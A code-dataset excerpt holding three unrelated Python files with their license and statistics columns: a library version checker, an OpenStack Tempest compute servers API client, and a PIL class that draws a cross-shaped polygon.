import_log += "- Wrong SciPy version (%s), please install SciPy %s\r\n"%(sc.__version__, ver_SciPy)
except ImportError:
import_log += "- SciPy missing, please install SciPy %s\r\n"%(str(ver_SciPy))
try:
from PyQt4 import Qt
if not Qt.QT_VERSION_STR in ver_PyQt:
import_log += "- Wrong PyQt version (%s), please install PyQt %s\r\n"%(Qt.QT_VERSION_STR, ver_PyQt)
except ImportError:
import_log += "- PyQt missing, please install PyQt %s\r\n"%(str(ver_PyQt))
try:
from PyQt4 import Qwt5 as Qwt
if not Qwt.QWT_VERSION_STR in ver_PyQwt:
import_log += "- Wrong PyQwt version (%s), please install PyQwt %s\r\n"%(Qwt.QWT_VERSION_STR, ver_PyQwt)
except ImportError:
import_log += "- PyQwt missing, please install PyQwt %s\r\n"%(str(ver_PyQwt))
try:
from lxml import etree
if not etree.__version__ in ver_lxml:
import_log += "- Wrong lxml version (%s), please install lxml %s\r\n"%(etree.__version__, ver_lxml)
except ImportError:
import_log += "- lxml missing, please install lxml %s\r\n"%(str(ver_lxml))
|
gpl-3.0
| -9,222,157,332,096,377,000
| 32.855556
| 113
| 0.601211
| false
| 3.362272
| false
| false
| false
|
ntymtsiv/tempest
|
tempest/services/compute/v3/json/servers_client.py
|
1
|
16454
|
# Copyright 2012 OpenStack Foundation
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# Copyright 2013 IBM Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import time
import urllib
from tempest.common.rest_client import RestClient
from tempest.common import waiters
from tempest import config
from tempest import exceptions
CONF = config.CONF
class ServersV3ClientJSON(RestClient):
def __init__(self, auth_provider):
super(ServersV3ClientJSON, self).__init__(auth_provider)
self.service = CONF.compute.catalog_v3_type
def create_server(self, name, image_ref, flavor_ref, **kwargs):
"""
Creates an instance of a server.
name (Required): The name of the server.
image_ref (Required): Reference to the image used to build the server.
flavor_ref (Required): The flavor used to build the server.
Following optional keyword arguments are accepted:
admin_password: Sets the initial root password.
key_name: Key name of keypair that was created earlier.
meta: A dictionary of values to be used as metadata.
security_groups: A list of security group dicts.
networks: A list of network dicts with UUID and fixed_ip.
user_data: User data for instance.
availability_zone: Availability zone in which to launch instance.
access_ip_v4: The IPv4 access address for the server.
access_ip_v6: The IPv6 access address for the server.
min_count: Count of minimum number of instances to launch.
max_count: Count of maximum number of instances to launch.
disk_config: Determines if user or admin controls disk configuration.
return_reservation_id: Enable/Disable the return of reservation id
"""
post_body = {
'name': name,
'image_ref': image_ref,
'flavor_ref': flavor_ref
}
for option in ['admin_password', 'key_name', 'networks',
('os-security-groups:security_groups',
'security_groups'),
('os-user-data:user_data', 'user_data'),
('os-availability-zone:availability_zone',
'availability_zone'),
('os-access-ips:access_ip_v4', 'access_ip_v4'),
('os-access-ips:access_ip_v6', 'access_ip_v6'),
('os-multiple-create:min_count', 'min_count'),
('os-multiple-create:max_count', 'max_count'),
('metadata', 'meta'),
('os-disk-config:disk_config', 'disk_config'),
('os-multiple-create:return_reservation_id',
'return_reservation_id')]:
if isinstance(option, tuple):
post_param = option[0]
key = option[1]
else:
post_param = option
key = option
value = kwargs.get(key)
if value is not None:
post_body[post_param] = value
post_body = json.dumps({'server': post_body})
resp, body = self.post('servers', post_body, self.headers)
body = json.loads(body)
# NOTE(maurosr): this deals with the case of multiple server create
# with return reservation id set True
if 'servers_reservation' in body:
return resp, body['servers_reservation']
return resp, body['server']
def update_server(self, server_id, name=None, meta=None, access_ip_v4=None,
access_ip_v6=None, disk_config=None):
"""
Updates the properties of an existing server.
server_id: The id of an existing server.
name: The name of the server.
access_ip_v4: The IPv4 access address for the server.
access_ip_v6: The IPv6 access address for the server.
"""
post_body = {}
if meta is not None:
post_body['metadata'] = meta
if name is not None:
post_body['name'] = name
if access_ip_v4 is not None:
post_body['os-access-ips:access_ip_v4'] = access_ip_v4
if access_ip_v6 is not None:
post_body['os-access-ips:access_ip_v6'] = access_ip_v6
if disk_config is not None:
post_body['os-disk-config:disk_config'] = disk_config
post_body = json.dumps({'server': post_body})
resp, body = self.put("servers/%s" % str(server_id),
post_body, self.headers)
body = json.loads(body)
return resp, body['server']
def get_server(self, server_id):
"""Returns the details of an existing server."""
resp, body = self.get("servers/%s" % str(server_id))
body = json.loads(body)
return resp, body['server']
def delete_server(self, server_id):
"""Deletes the given server."""
return self.delete("servers/%s" % str(server_id))
def list_servers(self, params=None):
"""Lists all servers for a user."""
url = 'servers'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
return resp, body
def list_servers_with_detail(self, params=None):
"""Lists all servers in detail for a user."""
url = 'servers/detail'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
return resp, body
def wait_for_server_status(self, server_id, status, extra_timeout=0,
raise_on_error=True):
"""Waits for a server to reach a given status."""
return waiters.wait_for_server_status(self, server_id, status,
extra_timeout=extra_timeout,
raise_on_error=raise_on_error)
def wait_for_server_termination(self, server_id, ignore_error=False):
"""Waits for server to reach termination."""
start_time = int(time.time())
while True:
try:
resp, body = self.get_server(server_id)
except exceptions.NotFound:
return
server_status = body['status']
if server_status == 'ERROR' and not ignore_error:
raise exceptions.BuildErrorException(server_id=server_id)
if int(time.time()) - start_time >= self.build_timeout:
raise exceptions.TimeoutException
time.sleep(self.build_interval)
def list_addresses(self, server_id):
"""Lists all addresses for a server."""
resp, body = self.get("servers/%s/ips" % str(server_id))
body = json.loads(body)
return resp, body['addresses']
def list_addresses_by_network(self, server_id, network_id):
"""Lists all addresses of a specific network type for a server."""
resp, body = self.get("servers/%s/ips/%s" %
(str(server_id), network_id))
body = json.loads(body)
return resp, body
def action(self, server_id, action_name, response_key, **kwargs):
post_body = json.dumps({action_name: kwargs})
resp, body = self.post('servers/%s/action' % str(server_id),
post_body, self.headers)
if response_key is not None:
body = json.loads(body)[response_key]
return resp, body
def create_backup(self, server_id, backup_type, rotation, name):
"""Backup a server instance."""
return self.action(server_id, "create_backup", None,
backup_type=backup_type,
rotation=rotation,
name=name)
def change_password(self, server_id, admin_password):
"""Changes the root password for the server."""
return self.action(server_id, 'change_password', None,
admin_password=admin_password)
def reboot(self, server_id, reboot_type):
"""Reboots a server."""
return self.action(server_id, 'reboot', None, type=reboot_type)
def rebuild(self, server_id, image_ref, **kwargs):
"""Rebuilds a server with a new image."""
kwargs['image_ref'] = image_ref
if 'disk_config' in kwargs:
kwargs['os-disk-config:disk_config'] = kwargs['disk_config']
del kwargs['disk_config']
return self.action(server_id, 'rebuild', 'server', **kwargs)
def resize(self, server_id, flavor_ref, **kwargs):
"""Changes the flavor of a server."""
kwargs['flavor_ref'] = flavor_ref
if 'disk_config' in kwargs:
kwargs['os-disk-config:disk_config'] = kwargs['disk_config']
del kwargs['disk_config']
return self.action(server_id, 'resize', None, **kwargs)
def confirm_resize(self, server_id, **kwargs):
"""Confirms the flavor change for a server."""
return self.action(server_id, 'confirm_resize', None, **kwargs)
def revert_resize(self, server_id, **kwargs):
"""Reverts a server back to its original flavor."""
return self.action(server_id, 'revert_resize', None, **kwargs)
def create_image(self, server_id, name, meta=None):
"""Creates an image of the original server."""
post_body = {
'create_image': {
'name': name,
}
}
if meta is not None:
post_body['create_image']['metadata'] = meta
post_body = json.dumps(post_body)
resp, body = self.post('servers/%s/action' % str(server_id),
post_body, self.headers)
return resp, body
def list_server_metadata(self, server_id):
resp, body = self.get("servers/%s/metadata" % str(server_id))
body = json.loads(body)
return resp, body['metadata']
def set_server_metadata(self, server_id, meta, no_metadata_field=False):
if no_metadata_field:
post_body = ""
else:
post_body = json.dumps({'metadata': meta})
resp, body = self.put('servers/%s/metadata' % str(server_id),
post_body, self.headers)
body = json.loads(body)
return resp, body['metadata']
def update_server_metadata(self, server_id, meta):
post_body = json.dumps({'metadata': meta})
resp, body = self.post('servers/%s/metadata' % str(server_id),
post_body, self.headers)
body = json.loads(body)
return resp, body['metadata']
def get_server_metadata_item(self, server_id, key):
resp, body = self.get("servers/%s/metadata/%s" % (str(server_id), key))
body = json.loads(body)
return resp, body['metadata']
def set_server_metadata_item(self, server_id, key, meta):
post_body = json.dumps({'metadata': meta})
resp, body = self.put('servers/%s/metadata/%s' % (str(server_id), key),
post_body, self.headers)
body = json.loads(body)
return resp, body['metadata']
def delete_server_metadata_item(self, server_id, key):
resp, body = self.delete("servers/%s/metadata/%s" %
(str(server_id), key))
return resp, body
def stop(self, server_id, **kwargs):
return self.action(server_id, 'stop', None, **kwargs)
def start(self, server_id, **kwargs):
return self.action(server_id, 'start', None, **kwargs)
def attach_volume(self, server_id, volume_id, device='/dev/vdz'):
"""Attaches a volume to a server instance."""
return self.action(server_id, 'attach', None, volume_id=volume_id,
device=device)
def detach_volume(self, server_id, volume_id):
"""Detaches a volume from a server instance."""
return self.action(server_id, 'detach', None, volume_id=volume_id)
def live_migrate_server(self, server_id, dest_host, use_block_migration):
"""This should be called with administrator privileges ."""
migrate_params = {
"disk_over_commit": False,
"block_migration": use_block_migration,
"host": dest_host
}
req_body = json.dumps({'migrate_live': migrate_params})
resp, body = self.post("servers/%s/action" % str(server_id),
req_body, self.headers)
return resp, body
def migrate_server(self, server_id, **kwargs):
"""Migrates a server to a new host."""
return self.action(server_id, 'migrate', None, **kwargs)
def lock_server(self, server_id, **kwargs):
"""Locks the given server."""
return self.action(server_id, 'lock', None, **kwargs)
def unlock_server(self, server_id, **kwargs):
"""UNlocks the given server."""
return self.action(server_id, 'unlock', None, **kwargs)
def suspend_server(self, server_id, **kwargs):
"""Suspends the provided server."""
return self.action(server_id, 'suspend', None, **kwargs)
def resume_server(self, server_id, **kwargs):
"""Un-suspends the provided server."""
return self.action(server_id, 'resume', None, **kwargs)
def pause_server(self, server_id, **kwargs):
"""Pauses the provided server."""
return self.action(server_id, 'pause', None, **kwargs)
def unpause_server(self, server_id, **kwargs):
"""Un-pauses the provided server."""
return self.action(server_id, 'unpause', None, **kwargs)
def reset_state(self, server_id, state='error'):
"""Resets the state of a server to active/error."""
return self.action(server_id, 'reset_state', None, state=state)
def shelve_server(self, server_id, **kwargs):
"""Shelves the provided server."""
return self.action(server_id, 'shelve', None, **kwargs)
def unshelve_server(self, server_id, **kwargs):
"""Un-shelves the provided server."""
return self.action(server_id, 'unshelve', None, **kwargs)
def get_console_output(self, server_id, length):
return self.action(server_id, 'get_console_output', 'output',
length=length)
def rescue_server(self, server_id, **kwargs):
"""Rescue the provided server."""
return self.action(server_id, 'rescue', None, **kwargs)
def unrescue_server(self, server_id):
"""Unrescue the provided server."""
return self.action(server_id, 'unrescue', None)
def get_server_diagnostics(self, server_id):
"""Get the usage data for a server."""
resp, body = self.get("servers/%s/os-server-diagnostics" %
str(server_id))
return resp, json.loads(body)
def list_instance_actions(self, server_id):
"""List the provided server action."""
resp, body = self.get("servers/%s/os-instance-actions" %
str(server_id))
body = json.loads(body)
return resp, body['instance_actions']
def get_instance_action(self, server_id, request_id):
"""Returns the action details of the provided server."""
resp, body = self.get("servers/%s/os-instance-actions/%s" %
(str(server_id), str(request_id)))
body = json.loads(body)
return resp, body['instance_action']
def force_delete_server(self, server_id, **kwargs):
"""Force delete a server."""
return self.action(server_id, 'force_delete', None, **kwargs)
def restore_soft_deleted_server(self, server_id, **kwargs):
"""Restore a soft-deleted server."""
return self.action(server_id, 'restore', None, **kwargs)
|
apache-2.0
| 5,713,543,314,471,721,000
| 39.034063
| 79
| 0.581682
| false
| 3.99272
| true
| false
| false
|
FlintHill/SUAS-Competition
|
UpdatedSyntheticDataset/SyntheticDataset2/ElementsCreator/cross.py
|
1
|
1798
|
from PIL import ImageDraw, Image
from SyntheticDataset2.ElementsCreator import Shape
class Cross(Shape):
def __init__(self, height, color, rotation):
"""
Initialize a Cross shape
:param height: height in pixels
:type height: int
:param color: color of shape - RGB
:type color: 3-tuple int
:param rotation: degrees counterclockwise shape will be rotated
:type rotation: int
"""
super(Cross, self).__init__(color, rotation)
self.height = height
self.coordinates = self.get_coordinates()
def get_coordinates(self):
"""
:param coordinates: drawing coordinates for the shape
:type coordinates: list of 2-tuple xy pixel coordinates
"""
x1 = self.height/3
y1 = 0
x2 = 2*self.height/3
y2 = 0
x3 = 2*self.height/3
y3 = self.height/3
x4 = self.height
y4 = self.height/3
x5 = self.height
y5 = 2*self.height/3
x6 = 2*self.height/3
y6 = 2*self.height/3
x7 = 2*self.height/3
y7 = self.height
x8 = self.height/3
y8 = self.height
x9 = self.height/3
y9 = 2*self.height/3
x10 = 0
y10 = 2*self.height/3
x11 = 0
y11 = self.height/3
x12 = self.height/3
y12 = self.height/3
return [(x1,y1),(x2,y2),(x3,y3),(x4,y4),(x5,y5),(x6,y6),(x7,y7),(x8,y8),(x9,y9),(x10,y10),(x11,y11),(x12,y12)]
def draw(self):
new_cross = Image.new('RGBA', (self.height,self.height), color=(255,255,255,0))
draw = ImageDraw.Draw(new_cross)
draw.polygon(self.coordinates, fill=self.color)
new_cross = new_cross.rotate(self.rotation, expand=1)
return new_cross
|
mit
| 8,255,110,933,483,183,000
| 29.474576
| 118
| 0.560623
| false
| 3.354478
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.